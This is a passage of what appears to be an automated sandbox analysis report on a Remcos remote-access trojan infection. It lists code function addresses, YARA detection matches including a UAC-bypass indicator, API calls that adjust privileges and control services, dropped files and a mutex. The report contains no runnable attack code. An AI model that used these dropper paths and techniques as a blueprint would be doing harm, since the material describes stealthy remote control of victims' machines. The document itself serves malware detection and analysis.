                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAD41025_2_00007FF67DEAD410
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE373F825_2_00007FF67DE373F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0D2B425_2_00007FF67DF0D2B4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5B36C25_2_00007FF67DE5B36C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6734025_2_00007FF67DE67340
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE58F1C25_2_00007FF67DE58F1C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE36EF425_2_00007FF67DE36EF4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6EED425_2_00007FF67DE6EED4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5EDA425_2_00007FF67DE5EDA4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA6D7C25_2_00007FF67DEA6D7C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF511C25_2_00007FF67DEF511C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF12D6C25_2_00007FF67DF12D6C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4B09C25_2_00007FF67DE4B09C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8D09425_2_00007FF67DE8D094
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7107C25_2_00007FF67DE7107C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3103025_2_00007FF67DE31030
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF14E5825_2_00007FF67DF14E58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF18EAC25_2_00007FF67DF18EAC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED4F9425_2_00007FF67DED4F94
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE64F9025_2_00007FF67DE64F90
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE84B3025_2_00007FF67DE84B30
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB6A8425_2_00007FF67DEB6A84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBEA7C25_2_00007FF67DEBEA7C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF04A4025_2_00007FF67DF04A40
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF08C5825_2_00007FF67DF08C58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBAA0025_2_00007FF67DEBAA00
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9E9F025_2_00007FF67DE9E9F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE909EC25_2_00007FF67DE909EC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3CC8C25_2_00007FF67DF3CC8C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8899025_2_00007FF67DE88990
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9698425_2_00007FF67DE96984
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF28CF425_2_00007FF67DF28CF4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3294025_2_00007FF67DE32940
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE88D2C25_2_00007FF67DE88D2C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE92D1825_2_00007FF67DE92D18
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8CD1025_2_00007FF67DE8CD10
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC2CF825_2_00007FF67DEC2CF8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE48D0025_2_00007FF67DE48D00
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECCCA825_2_00007FF67DECCCA8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEACC8025_2_00007FF67DEACC80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0A9F025_2_00007FF67DF0A9F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE80C2825_2_00007FF67DE80C28
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3AC0825_2_00007FF67DE3AC08
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF24A5825_2_00007FF67DF24A58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1AA5825_2_00007FF67DF1AA58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7CBFC25_2_00007FF67DE7CBFC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA8BD425_2_00007FF67DEA8BD4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE6B9425_2_00007FF67DEE6B94
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE54B6825_2_00007FF67DE54B68
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF2675025_2_00007FF67DF26750
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAC6F825_2_00007FF67DEAC6F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9C6D025_2_00007FF67DE9C6D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9863025_2_00007FF67DE98630
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFC63025_2_00007FF67DEFC630
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF2285425_2_00007FF67DF22854
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE405E025_2_00007FF67DE405E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF148C425_2_00007FF67DF148C4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF108C825_2_00007FF67DF108C8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECE57C25_2_00007FF67DECE57C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8258025_2_00007FF67DE82580
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6857025_2_00007FF67DE68570
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9655C25_2_00007FF67DE9655C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0453825_2_00007FF67DF04538
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF285A825_2_00007FF67DF285A8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF385EC25_2_00007FF67DF385EC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBE84425_2_00007FF67DEBE844
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBC7F025_2_00007FF67DEBC7F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB27D025_2_00007FF67DEB27D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE07D025_2_00007FF67DEE07D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1234C25_2_00007FF67DF1234C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8E29C25_2_00007FF67DE8E29C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5227C25_2_00007FF67DE5227C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA628025_2_00007FF67DEA6280
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1E43025_2_00007FF67DF1E430
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF4842F25_2_00007FF67DF4842F
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF821C25_2_00007FF67DEF821C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBA1E825_2_00007FF67DEBA1E8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1049025_2_00007FF67DF10490
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8C1D025_2_00007FF67DE8C1D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF184D825_2_00007FF67DF184D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3817025_2_00007FF67DE38170
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5014025_2_00007FF67DE50140
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3C52025_2_00007FF67DE3C520
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBE4F025_2_00007FF67DEBE4F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE444E025_2_00007FF67DE444E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA24D425_2_00007FF67DEA24D4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE764A825_2_00007FF67DE764A8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC848825_2_00007FF67DEC8488
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8848425_2_00007FF67DE88484
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF441F825_2_00007FF67DF441F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAA45025_2_00007FF67DEAA450
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAC45025_2_00007FF67DEAC450
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3A42425_2_00007FF67DE3A424
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB841425_2_00007FF67DEB8414
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5441025_2_00007FF67DE54410
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1427425_2_00007FF67DF14274
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC43D025_2_00007FF67DEC43D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9039825_2_00007FF67DE90398
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7E3A025_2_00007FF67DE7E3A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC637425_2_00007FF67DEC6374
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028B835928_2_028B8359
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028920C428_2_028920C4
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA0DB6228_2_1BA0DB62
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA4332B28_2_1BA4332B
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2E2FB28_2_1BA2E2FB
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA361F028_2_1BA361F0
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2394628_2_1BA23946
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA278FE28_2_1BA278FE
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2E0CC28_2_1BA2E0CC
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA26FEA28_2_1BA26FEA
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2876228_2_1BA28762
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2DE9D28_2_1BA2DE9D
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA25E5E28_2_1BA25E5E
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA2E55828_2_1BA2E558
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA274E628_2_1BA274E6
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BCAA54
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC8DF8
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BD5554
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BD7854
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BD37D8
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC3410
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BE7F00
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BD0A6C
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BCE680
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BEEE88
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BD4224
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC2220
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC4A30
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BEAA30
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC5240
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC7650
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BCD250
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC9E50
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BCCE10
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC81D4
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BED9D0
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC7D30
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BCB0D8
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC8510
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BD18D4
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC1884
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC2C48
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BEAC4C
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC6BE0
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BEAFBC
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC5B70
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC3F90
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC372C
Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC9B50
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_029A20C4
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_210B4159
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21098168
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_210A61F0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_2109E0CC
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_2107F0FA
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_210B332B
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_2108739D
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_2109E2FB
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_2109E558
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_210974E6
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21098770
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21093946
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_210AD9C9
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_210978FE
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_2107DB62
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21087BAF
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21087A46
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21097D33
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21073FCA
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21096FEA
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21086E0E
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21095E5E
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_2109DE9D
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: String function: 029A4668 appears 244 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: String function: 029A6604 appears 32 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: String function: 21062093 appears 50 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: String function: 029A4470 appears 67 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: String function: 029A47D0 appears 771 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: String function: 21094770 appears 41 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: String function: 029B7B60 appears 45 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: String function: 21061E65 appears 34 times
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: String function: 21094E10 appears 54 times
Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: String function: 028947D0 appears 522 times
Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: String function: 02896604 appears 33 times
Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: String function: 02894668 appears 154 times
Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: String function: 1BA24E10 appears 54 times
Source: C:\Users\Public\alpha.exe | Code function: String function: 00007FF789BD3448 appears 54 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF67DEEABFC appears 818 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF67DEF0D10 appears 181 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF67DF464A6 appears 173 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF67DECEB98 appears 93 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF67DE3D1C8 appears 41 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF67DEF7BAC appears 34 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF67DE6BC9C appears 280 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF67DF3F11C appears 37 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF67DF3F1B8 appears 183 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF67DEF7D70 appears 35 times
Source: C:\Users\Public\ger.exe | Code function: String function: 00007FF65588D3D0 appears 56 times
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.bank.troj.spyw.expl.evad.winCMD@68/35@11/6
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BC32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError
Source: C:\Users\Public\ger.exe | Code function: 14_2_00007FF655883F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF1826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle
Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA07952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21077952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BEFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z
Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1B9FF8FD CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE77EC0 CoCreateInstance,#357,#207,LocalFree,LocalFree
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF43148 FindResourceExW,LoadResource
Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA0AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
Source: C:\Users\Public\xkn.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
Source: C:\Users\Public\Libraries\sppsvc.pif | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
Source: C:\Users\Public\xkn.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3ru4bzt.u0w.ps1
Source: C:\Users\Public\Libraries\sppsvc.pif | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
